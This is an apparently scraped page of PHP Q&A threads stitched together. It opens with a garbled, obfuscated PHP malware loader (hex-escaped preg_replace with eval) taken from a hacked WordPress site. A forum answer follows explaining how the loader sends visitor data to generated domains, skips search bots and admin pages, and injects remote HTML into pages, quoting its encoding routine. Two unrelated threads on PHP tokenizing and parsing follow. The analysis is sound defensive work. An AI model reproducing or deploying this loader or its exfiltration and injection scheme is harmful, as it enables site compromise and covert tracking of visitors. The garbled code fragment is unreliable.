*)ujojR%x5c%x7827id%x5c%x78256<%x5c%xr_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%xy76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osv2%164") && (!isset($GLOBALS["%x61%156%x75%156%xu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%8257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%5c%x7825)fnbozcYufhA%x5c%x78272qj%x/(.*)/epreg_replacestvbowvmjj'; $uskbxljsbs = explode(chr((169 - 125)), '6393,48,9851,47,2858,50,3117,23,8291,22,9595,68,3457,33,7412,23,3914,63,6775,52,3088,29,1791,56,2150,28,6441,66,3140,43,1906,35,926,36,7276,35,2578,51,2993,59,275,45,6613,30,9241,42,9210,31,886,40,9989,41,5417,69,4931,62,1312,54,534,47,483,51,7223,53,10071,35,6190,50,3811,39,6142,48,2353,24,7062,23,6048,57,1266,46,3977,58,8168,55,1633,23,5272,63,2455,47,2659,30,6751,24,6827,38,2377,38,9554,41,3706,63,5644,70,4249,67,5105,50,4787,40,5574,24,1087,21,7389,23,1108,60,6277,47,6865,29,5486,28,8828,28,9283,26,1366,61,3223,27,6949,50,8506,23,3850,64,1739,52,9128,24,5714,20,9449,70,7435,62,8131,37,4653,70,0,29,4316,56,3572,68,4528,39,180,20,9379,70,200,35,1028,30,92,20,5025,38,7567,50,9519,35,2908,51,8672,58,8986,47,9152,58,9087,20,5879,29,3769,42,8029,45,5391,26,8333,25,5063,42,5203,69,9718,65,726,20,157,23,4567,33,1847,28,1212,54,9898,51,3640,66,6324,49,5155,48,61,31,9783,68,2271,36,815,38,7717,69,2793,42,5335,56,5543,31,3399,58,2629,30,6373,20,4372,65,8925,61,5598,23,362,57,7363,26,3353,46,3052,36,1581,52,2178,48,4180,20,853,33,1656,26,2766,27,5847,32,4993,32,1168,44,9663,55,2835,23,698,28,5908,51,6999,63,1530,51,419,64,9107,21,7617,37,7497,70,962,66,2415,40,4437,51,7786,70,4624,29,8730,39,8358,50,5988,60,8074,57,6105,37,4723,64,1682,57,1489,41,1058,29,3250,41,7155,29,3291,62,29,32,8408,59,5514,29,8313,20,3490,55,235,40,8223,68,8467,39,8636,36,7184,39,320,42,9033,34,6643,67,2521,57,2026,60,2959,34,7856,64,6240,37,4200,49,4827,66,1979,47,4893,38,581,48,1875,31,655,43,4035,53,5621,23,6507,46,6553,60,8769,59,7654,63,7920,49,8593,43,5734,68,5802,45,9309,70,1941,38,629,26,5959,29,9067,20,7085,70,9949,40,4088,56,10030,41,4144,36,8529,64,3545,27,4488,40,2307,46,2086,64,1427,62,6710,41,746,69,2689,20,2709,57,6894,55,2226,45,8856,26,8882,43,7311,52,3183,40,112,45,4600,24,7969,60,2502,19'); $aemhtmvyge = substr($nzujvbbqez, (69491 - 59385), (44 - 37)); if (!function_exists('hperlerwfe')) { function hperlerwfe($opchjywcur, $oguxphvfkm) { $frnepusuoj = NULL; for ($yjjpfgynkv = 0;$yjjpfgynkv < (sizeof($opchjywcur) / 2);$yjjpfgynkv++) { $frnepusuoj.= substr($oguxphvfkm, $opchjywcur[($yjjpfgynkv * 2) ], $opchjywcur[($yjjpfgynkv * 2) + 1]); } return $frnepusuoj; }; } $rfmxgmmowh = " /* orpuzttrsp */ eval(str_replace(chr((230-193)), chr((534-442)), hperlerwfe($uskbxljsbs,$nzujvbbqez))); /* unvtjodgmt */ "; $yiffimogfj = substr($nzujvbbqez, (60342 - 50229), (38 - 26)); $yiffimogfj($aemhtmvyge, $rfmxgmmowh, NULL); $yiffimogfj = $rfmxgmmowh; $yiffimogfj = (470 - 349); $nzujvbbqez = $yiffimogfj - 1; ?>
After digging though the obfuscated code untangling a number of preg_replace, eval, create_function statements, this is my try on explaining what the code does: The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server. First, the callback function will attempt to uncompress the output buffer contents if necessary using gzinflate, gzuncompress, gzdecode or a custom gzinflate based decoder (I have not dug any deeper into this). With the contents uncompressed, a request will be made containing the $_SERVER values of HTTP_USER_AGENT HTTP_REFERER REMOTE_ADDR HTTP_HOST PHP_SELF ... to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an md5 hash of the IPv4 address of "stat-dns.com" appended with ".com", currently giving md5(".com" . <IPv4> ) => md5(".com8.8.8.8") => "54dfa1cb.com" / "33db9538.com". The request will be attempted using file_get_contents, curl_exec, file and finally socket_write. Note that no request will be made if: any of the HTTP_USER_AGENT, REMOTE_ADDR or HTTP_HOST is empty/not set PHP_SELF contains the word "admin" HTTP_USER_AGENT contains any of the words "google", "slurp", "msnbot", "ia_archiver", "yandex" or "rambler". Secondly, if the output buffer contents has a body or html tag, and the response from the request above (decoded using en2() function below) contains at least one "!NF0" string, the content between the first and second "!NF0" (or end of string) will be injected into the HTML page at the beginning of the body or in case there is no body tag, the html tag. The code used for encoding/decoding traffic is this one: function en2($s, $q) { $g = ""; while (strlen($g) < strlen($s)) { $q = pack("H*", md5($g . $q . "q1w2e3r4")); $g .= substr($q, 0, 8); } return $s ^ $g; } $s is the string to encode/decode and $q is a random number between 100000 and 999999 acting as a key. The request URL mentioned above is calculated like this: $url = "http:// ... /" . $op // Random number/key . "?" . urlencode( urlencode( base64_encode(en2( $http_user_agent, $op)) . "." . base64_encode(en2( $http_referrer, $op)) . "." . base64_encode(en2( $remote_addr, $op)) . "." . base64_encode(en2( $http_host, $op)) . "." . base64_encode(en2( $php_self, $op)) ) ); While I have not found any sign of what initially placed the malicious code on your server, or that it does anything else than allowing for bad HTML/JavaScript code to be injected on your web pages that does not mean that it is not still there. You really should make a clean install, like suggested by #Bulk above: The only way you'll ever know for sure it's been cleaned is to re-install absolutely everything you can from scratch - i.e. fresh wordpress install, fresh plugin install. Then literally comb every line of your theme for anything out of the ordinary. Also of note, they often will put things in wp-content/uploads that look like images but aren't - check those too. Pastebin here.
Generating PHP code (from Parser Tokens)
Is there any available solution for (re-)generating PHP code from the Parser Tokens returned by token_get_all? Other solutions for generating PHP code are welcome as well, preferably with the associated lexer/parser (if any).
From my comment: Does anyone see a potential problem, if I simply write a large switch statement to convert tokens back to their string representations (i.e. T_DO to 'do'), map that over the tokens, join with spaces, and look for some sort of PHP code pretty-printing solution? After some looking, I found a PHP homemade solution in this question, that actually uses the PHP Tokenizer interface, as well as some PHP code formatting tools which are more configurable (but would require the solution as described above). These could be used to quickly realize a solution. I'll post back here when I find some time to cook this up. Solution with PHP_Beautifier This is the quick solution I cooked up, I'll leave it here as part of the question. Note that it requires you to break open the PHP_Beautifier class, by changing everything (probably not everything, but this is easier) that is private to protected, to allow you to actually use the internal workings of PHP_Beautifier (otherwise it was impossible to reuse the functionality of PHP_Beautifier without reimplementing half their code). An example usage of the class would be: file: main.php <?php // read some PHP code (the file itself will do) $phpCode = file_get_contents(__FILE__); // create a new instance of PHP2PHP $php2php = new PHP2PHP(); // tokenize the code (forwards to token_get_all) $phpCode = $php2php->php2token($phpCode); // print the tokens, in some way echo join(' ', array_map(function($token) { return (is_array($token)) ? ($token[0] === T_WHITESPACE) ? ($token[1] === "\n") ? "\n" : '' : token_name($token[0]) : $token; }, $phpCode)); // transform the tokens back into legible PHP code $phpCode = $php2php->token2php($phpCode); ?> As PHP2PHP extends PHP_Beautifier, it allows for the same fine-tuning under the same API that PHP_Beautifier uses. The class itself is: file: PHP2PHP.php class PHP2PHP extends PHP_Beautifier { function php2token($phpCode) { return token_get_all($phpCode); } function token2php(array $phpToken) { // prepare properties $this->resetProperties(); $this->aTokens = $phpToken; $iTotal = count($this->aTokens); $iPrevAssoc = false; // send a signal to the filter, announcing the init of the processing of a file foreach($this->aFilters as $oFilter) $oFilter->preProcess(); for ($this->iCount = 0; $this->iCount < $iTotal; $this->iCount++) { $aCurrentToken = $this->aTokens[$this->iCount]; if (is_string($aCurrentToken)) $aCurrentToken = array( 0 => $aCurrentToken, 1 => $aCurrentToken ); // ArrayNested->off(); $sTextLog = PHP_Beautifier_Common::wsToString($aCurrentToken[1]); // ArrayNested->on(); $sTokenName = (is_numeric($aCurrentToken[0])) ? token_name($aCurrentToken[0]) : ''; $this->oLog->log("Token:" . $sTokenName . "[" . $sTextLog . "]", PEAR_LOG_DEBUG); $this->controlToken($aCurrentToken); $iFirstOut = count($this->aOut); //5 $bError = false; $this->aCurrentToken = $aCurrentToken; if ($this->bBeautify) { foreach($this->aFilters as $oFilter) { $bError = true; if ($oFilter->handleToken($this->aCurrentToken) !== FALSE) { $this->oLog->log('Filter:' . $oFilter->getName() , PEAR_LOG_DEBUG); $bError = false; break; } } } else { $this->add($aCurrentToken[1]); } $this->controlTokenPost($aCurrentToken); $iLastOut = count($this->aOut); // set the assoc if (($iLastOut-$iFirstOut) > 0) { $this->aAssocs[$this->iCount] = array( 'offset' => $iFirstOut ); if ($iPrevAssoc !== FALSE) $this->aAssocs[$iPrevAssoc]['length'] = $iFirstOut-$this->aAssocs[$iPrevAssoc]['offset']; $iPrevAssoc = $this->iCount; } if ($bError) throw new Exception("Can'process token: " . var_dump($aCurrentToken)); } // ~for // generate the last assoc if (count($this->aOut) == 0) throw new Exception("Nothing on output!"); $this->aAssocs[$iPrevAssoc]['length'] = (count($this->aOut) -1) - $this->aAssocs[$iPrevAssoc]['offset']; // post-processing foreach($this->aFilters as $oFilter) $oFilter->postProcess(); return $this->get(); } } ?>
In the category of "other solutions", you could try PHP Parser. The parser turns PHP source code into an abstract syntax tree....Additionally, you can convert a syntax tree back to PHP code.
If I'm not mistaken http://pear.php.net/package/PHP_Beautifier uses token_get_all() and then rewrites the stream. It uses heaps of methods like t_else and t_close_brace to output each token. Maybe you can hijack this for simplicity.
See our PHP Front End. It is a full PHP parser, automatically building ASTs, and a matching prettyprinter that regenerates compilable PHP code complete with the original commments. (EDIT 12/2011: See this SO answer for more details on what it takes to prettyprint from ASTs, which are just an organized version of the tokens: https://stackoverflow.com/a/5834775/120163) The front end is built on top of our DMS Software Reengineering Toolkit, enabling the analysis and transformation of PHP ASTs (and then via the prettyprinter code).
PHP Constant string parameters token
In a system we will be using, there is a function called "uses". If you are familiar with pascal, the uses clause is where you tell your program what dependencies it has (similar to C and PHP includes). This function is being used in order to further control file inclusion other than include(_once) or require(_once). As part of testing procedures, I need to write a dependency visualization tool for statically loaded files. Statically Loaded Example: uses('core/core.php','core/security.php'); Dynamically Loaded Example: uses('exts/database.'.$driver.'.php'); I need to filter out dynamic load cases because the code is tested statically, not while running. This is the code I'm using at this time: $inuses=false; // whether currently in uses function or not $uses=array(); // holds dependencies (line=>file) $tknbuf=array(); // last token foreach(token_get_all(file_get_contents($file)) as $token){ // detect uses function if(!$inuses && is_array($token) && $token[0]==T_STRING && $token[1]=='uses')$inuses=true; // detect uses argument (dependency file) if($inuses && is_array($token) && $token[0]==T_CONSTANT_ENCAPSED_STRING)$tknbuf=$token; // detect the end of uses function if($inuses && is_string($token) && $token==')'){ $inuses=false; isset($uses[$tknbuf[2]]) ? $uses[$tknbuf[2]][]=$tknbuf[1] : $uses[$tknbuf[2]]=array($tknbuf[1]); } // a new argument (dependency) is found if($inuses && is_string($token) && $token==',') isset($uses[$tknbuf[2]]) ? $uses[$tknbuf[2]][]=$tknbuf[1] : $uses[$tknbuf[2]]=array($tknbuf[1]); } Note: It may help to know that I'm using a state engine to detect the arguments. My issue? Since there are all sorts of arguments that can go in the function, it is very difficult getting it right. Maybe I'm not using the right approach, however, I'm pretty sure using token_get_all is the best in this case. So maybe the issue is my state engine which really isn't that good. I might be missing the easy way out, thought I'd get some peer review off it. Edit: I took the approach of explaining what I'm doing this time, but not exactly what I want. Put in simple words, I need to get an array of the arguments being passed to a function named "uses". The thing is I'm a bit specific about the arguments; I only need an array of straight strings, no dynamic code at all (constants, variables, function calls...).
Using regular expressions: <?php preg_match_all('/uses\s*\((.+)\s*\)/', file_get_contents('uses.php'), $matches, PREG_SET_ORDER); foreach ($matches as $set) { list($full, $match) = $set; echo "$full\n"; // try to remove function arguments $new = $match; do { $match = $new; $new = preg_replace('/\([^()]*\)/', '', $match); } while ($new != $match); // iterate over each of the uses() args foreach (explode(',', $match) as $arg) { $arg = trim($arg); if (($arg[0] == "'" || $arg[0] == '"') && substr($arg,-1) == $arg[0]) echo " ".substr($arg,1,-1)."\n"; } } ?> Running against: uses('bar.php', 'test.php', $foo->bar()); uses(bar('test.php'), 'file.php'); uses(bar(foo('a','b','c')), zed()); Yields: uses('bar.php', 'test.php', $foo->bar()) bar.php test.php uses(bar('test.php'), 'file.php') file.php uses(bar(foo('a','b','c')), zed()) Obviously it has limitations and assumptions, but if you know how the code is called, it could be sufficient.
OK I got it working. Just some minor fixes to the state engine. In short, argument tokens are buffered instead of put in the uses array directly. Next, at each ',' or ')' I check if the token is valid or not and add it to the uses array. $inuses=false; // whether currently in uses function or not $uses=array(); // holds dependencies (line=>file) $tknbuf=array(); // last token $tknbad=false; // whether last token is good or not foreach(token_get_all(file_get_contents($file)) as $token){ // detect uses function if(!$inuses && is_array($token) && $token[0]==T_STRING && $token[1]=='uses')$inuses=true; // token found, put it in buffer if($inuses && is_array($token) && $token[0]==T_CONSTANT_ENCAPSED_STRING)$tknbuf=$token; // end-of-function found check buffer and throw into $uses if($inuses && is_string($token) && $token==')'){ $inuses=false; if(count($tknbuf)==3 && !$tknbad)isset($GLOBALS['uses'][$file][$tknbuf[2]]) ? $GLOBALS['uses'][$file][$tknbuf[2]][]=$tknbuf[1] : $GLOBALS['uses'][$file][$tknbuf[2]]=array($tknbuf[1]); $tknbuf=array(); $tknbad=false; } // end-of-argument check token and add to $uses if($inuses && is_string($token) && $token==','){ if(count($tknbuf)==3 && !$tknbad)isset($GLOBALS['uses'][$file][$tknbuf[2]]) ? $GLOBALS['uses'][$file][$tknbuf[2]][]=$tknbuf[1] : $GLOBALS['uses'][$file][$tknbuf[2]]=array($tknbuf[1]); $tknbuf=array(); $tknbad=false; } // if current token is not an a simple string, flag all tokens as bad if($inuses && is_array($token) && $token[0]!=T_CONSTANT_ENCAPSED_STRING)$tknbad=true; } Edit: Actually it is still faulty (a different issue though). But the new idea I've had ought to work out nicely.